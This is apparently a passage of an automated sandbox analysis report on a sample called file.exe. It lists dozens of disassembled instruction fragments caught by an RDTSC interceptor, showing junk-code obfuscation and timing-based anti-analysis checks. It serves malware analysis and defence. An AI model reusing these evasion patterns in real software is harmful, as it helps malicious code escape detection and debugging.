              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD86CB second address: BD86DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 je 00007F0B48765F34h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD86DD second address: BD86F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0B48B8DEE6h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD88A3 second address: BD88E8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B48765F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push esi 0x00000013 jnp 00007F0B48765F2Ch 0x00000019 pop esi 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jmp 00007F0B48765F35h 0x00000023 mov eax, dword ptr [eax] 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007F0B48765F2Ch 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD88E8 second address: BD88EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD88EC second address: 9FFB1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d je 00007F0B48765F43h 0x00000013 je 00007F0B48765F3Dh 0x00000019 jmp 00007F0B48765F37h 0x0000001e pop eax 0x0000001f jno 00007F0B48765F2Eh 0x00000025 jns 00007F0B48765F31h 0x0000002b push dword ptr [ebp+122D0BD9h] 0x00000031 jmp 00007F0B48765F2Ah 0x00000036 call dword ptr [ebp+122D1A63h] 0x0000003c pushad 0x0000003d add dword ptr [ebp+122D1B47h], ebx 0x00000043 xor eax, eax 0x00000045 mov dword ptr [ebp+122D1C6Bh], edx 0x0000004b mov edx, dword ptr [esp+28h] 0x0000004f jmp 00007F0B48765F33h 0x00000054 mov dword ptr [ebp+122D36CAh], eax 0x0000005a stc 0x0000005b stc 0x0000005c mov esi, 0000003Ch 0x00000061 jmp 00007F0B48765F32h 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a add dword ptr [ebp+122D1AE6h], edx 0x00000070 lodsw 0x00000072 or dword ptr [ebp+122D1AE6h], eax 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c jmp 00007F0B48765F37h 0x00000081 jmp 00007F0B48765F33h 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a mov dword ptr [ebp+122D1B6Ah], eax 0x00000090 push eax 0x00000091 push ebx 0x00000092 push esi 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE470 second address: BDE474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD20B second address: BDD218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007F0B48765F2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD218 second address: BDD21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD758 second address: BDD762 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD762 second address: BDD76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0B48B8DEE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD76C second address: BDD774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD774 second address: BDD77E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0B48B8DEF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD77E second address: BDD795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48765F2Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD795 second address: BDD7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD934 second address: BDD948 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B48765F28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c js 00007F0B48765F26h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD948 second address: BDD94C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE1BA second address: BDE1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE1BE second address: BDE1CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B48B8DEE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE1CA second address: BDE1D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F0B48765F26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE168E second address: BE16A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jmp 00007F0B48B8DEF2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE16A8 second address: BE16B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push edi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60B01 second address: B60B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6CCA second address: BE6CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6CCE second address: BE6CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6CD6 second address: BE6CDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6CDC second address: BE6CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48B8DEF4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6E66 second address: BE6E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE70FE second address: BE7104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE7104 second address: BE710E instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B48765F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE710E second address: BE712B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEECh 0x00000007 jne 00007F0B48B8DEE8h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE712B second address: BE7155 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0B48765F26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 jnc 00007F0B48765F37h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE7155 second address: BE715B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE766A second address: BE7670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE7670 second address: BE7674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE7674 second address: BE767F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE767F second address: BE7693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0B48B8DEE6h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jng 00007F0B48B8DEE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEC06B second address: BEC076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEC076 second address: BEC07A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB1B8C second address: B8ECEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F0B48765F26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F0B48765F2Ah 0x00000016 lea eax, dword ptr [ebp+124858FCh] 0x0000001c mov dword ptr [ebp+1244DDADh], edx 0x00000022 push eax 0x00000023 jne 00007F0B48765F38h 0x00000029 mov dword ptr [esp], eax 0x0000002c adc cl, 00000027h 0x0000002f call dword ptr [ebp+122D58B3h] 0x00000035 jnl 00007F0B48765F38h 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2084 second address: 9FFB1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0B48B8DEF3h 0x0000000f nop 0x00000010 mov di, ax 0x00000013 movzx edi, di 0x00000016 push dword ptr [ebp+122D0BD9h] 0x0000001c sub dx, 3D2Fh 0x00000021 call dword ptr [ebp+122D1A63h] 0x00000027 pushad 0x00000028 add dword ptr [ebp+122D1B47h], ebx 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1C6Bh], edx 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007F0B48B8DEF3h 0x0000003f mov dword ptr [ebp+122D36CAh], eax 0x00000045 stc 0x00000046 stc 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007F0B48B8DEF2h 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 add dword ptr [ebp+122D1AE6h], edx 0x0000005b lodsw 0x0000005d or dword ptr [ebp+122D1AE6h], eax 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 jmp 00007F0B48B8DEF7h 0x0000006c jmp 00007F0B48B8DEF3h 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 mov dword ptr [ebp+122D1B6Ah], eax 0x0000007b push eax 0x0000007c push ebx 0x0000007d push esi 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB21F6 second address: BB21FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB21FA second address: BB2219 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0B48B8DEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push esi 0x0000000d jnc 00007F0B48B8DEE8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2219 second address: BB221E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB221E second address: BB2246 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F0B48B8DEE6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jne 00007F0B48B8DEE8h 0x00000013 push 8B519EB0h 0x00000018 je 00007F0B48B8DEF2h 0x0000001e jbe 00007F0B48B8DEECh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB22FA second address: BB230E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], esi 0x00000009 mov ecx, dword ptr [ebp+122D17F4h] 0x0000000f nop 0x00000010 push esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB230E second address: BB231F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0B48B8DEE6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2405 second address: BB2455 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007F0B48765F26h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0B48765F34h 0x00000013 pop edx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F0B48765F34h 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F0B48765F2Eh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2455 second address: BB245A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB254B second address: BB2556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0B48765F26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2672 second address: BB2676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2676 second address: BB267C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB267C second address: BB26F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0B48B8DEEFh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F0B48B8DEE8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a sub dword ptr [ebp+12468870h], esi 0x00000030 push 00000004h 0x00000032 mov dword ptr [ebp+122D29BCh], edx 0x00000038 nop 0x00000039 jng 00007F0B48B8DEF8h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB26F5 second address: BB26FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2A76 second address: BB2AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F0B48B8DEE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 sub eax, dword ptr [ebp+122D2C8Bh] 0x00000018 mov esi, 415D4E5Ah 0x0000001d popad 0x0000001e push 0000001Eh 0x00000020 mov cx, DA73h 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D33F2h], eax 0x0000002b mov al, A5h 0x0000002d popad 0x0000002e push eax 0x0000002f pushad 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2B8B second address: BB2B91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB26E4 second address: BB26F5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0B48B8DEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2D97 second address: BB2D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2E4F second address: BB2E66 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B48B8DEECh 0x00000008 jg 00007F0B48B8DEE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2E66 second address: BB2E70 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0B48765F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB2E70 second address: BB2EDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F0B48B8DEE8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov edi, ebx 0x00000026 mov dh, B8h 0x00000028 lea eax, dword ptr [ebp+12485940h] 0x0000002e mov dword ptr [ebp+122D1B4Dh], esi 0x00000034 mov ecx, dword ptr [ebp+122D397Ah] 0x0000003a nop 0x0000003b jmp 00007F0B48B8DEF3h 0x00000040 push eax 0x00000041 js 00007F0B48B8DEEEh 0x00000047 push ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB498 second address: BEB4A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB4A6 second address: BEB4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB4AA second address: BEB4AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB630 second address: BEB634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB634 second address: BEB64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F0B48765F2Eh 0x0000000e jno 00007F0B48765F26h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBA7B second address: BEBA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBA81 second address: BEBA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBA85 second address: BEBA91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F0B48B8DEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBA91 second address: BEBA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBA97 second address: BEBA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBA9D second address: BEBAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF7DD second address: BEF7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF3E72 second address: BF3EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0B48765F34h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F0B48765F2Ah 0x00000011 jmp 00007F0B48765F37h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF4313 second address: BF4319 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF4319 second address: BF4329 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0B48765F32h 0x00000008 jne 00007F0B48765F26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF4484 second address: BF4488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF4488 second address: BF448E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF45B0 second address: BF45B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF45B6 second address: BF45BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF45BA second address: BF45CE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0B48B8DEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jp 00007F0B48B8DEE6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF46CE second address: BF46E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c jns 00007F0B48765F26h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF4990 second address: BF4995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF4AFF second address: BF4B1B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F0B48765F2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F0B48765F26h 0x00000013 rdtsc
